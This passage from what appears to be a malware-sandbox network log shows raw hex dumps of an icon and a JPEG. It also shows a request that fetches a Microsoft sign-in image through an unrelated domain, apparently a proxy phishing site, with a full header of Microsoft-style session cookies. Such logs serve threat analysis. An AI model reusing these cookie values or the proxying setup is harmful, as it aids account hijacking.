00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-04-26 11:21:37 UTC	1534	IN	Data Raw: 01 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:37 UTC	1719	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/images/appbackgrounds/49-small_e58aafc980614a9cd7796bea7b5ea8f0.jpg HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA; brcap=0
2024-04-26 11:21:38 UTC	755	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 11:21:38 GMT Content-Type: image/jpeg Content-Length: 987 Connection: close Cache-Control: public, max-age=31536000 Last-Modified: Fri, 27 Mar 2020 19:41:47 GMT ETag: 0x8D7D286E322A911 x-ms-request-id: 77152afa-e01e-0068-3dcb-97ffad000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T112138Z-17859dc676b6dmfqzsff11v9sc000000044000000000pwxe x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-04-26 11:21:38 UTC	987	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 66 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 04 01 1a 00 05 00 00 00 01 00 00 00 3e 01 1b 00 05 00 00 00 01 00 00 00 46 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 10 00 00 00 4e 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 70 61 69 6e 74 2e 6e 65 74 20 34 2e 32 2e 39 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: JFIFHHfExifMM*>F(1NHHpaint.net 4.2.9CC